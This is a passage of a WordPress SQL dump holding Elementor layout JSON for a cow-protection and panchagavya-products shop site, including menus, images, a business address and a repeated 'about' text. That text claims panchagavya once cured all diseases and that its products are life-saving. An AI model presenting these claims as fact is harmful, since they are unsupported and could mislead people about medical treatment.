namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11714,1942,'_elementor_page_assets','a:0:{}'),(11716,1943,'_elementor_edit_mode','builder'),(11717,1943,'_elementor_template_type','wp-page'),(11718,1943,'_elementor_version','3.7.8'),(11719,1943,'_wp_page_template','elementor_canvas'),(11720,1943,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11721,1943,'_elementor_page_assets','a:0:{}'),(11723,1944,'_elementor_edit_mode','builder'),(11724,1944,'_elementor_template_type','wp-page'),(11725,1944,'_elementor_version','3.7.8'),(11726,1944,'_wp_page_template','elementor_canvas'),(11727,1944,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"08fdbe7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bc55a55\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfae959\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11728,1944,'_elementor_page_assets','a:0:{}'),(11731,1945,'_elementor_edit_mode','builder'),(11732,1945,'_elementor_template_type','wp-page'),(11733,1945,'_elementor_version','3.7.8'),(11734,1945,'_wp_page_template','elementor_canvas'),(11735,1945,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 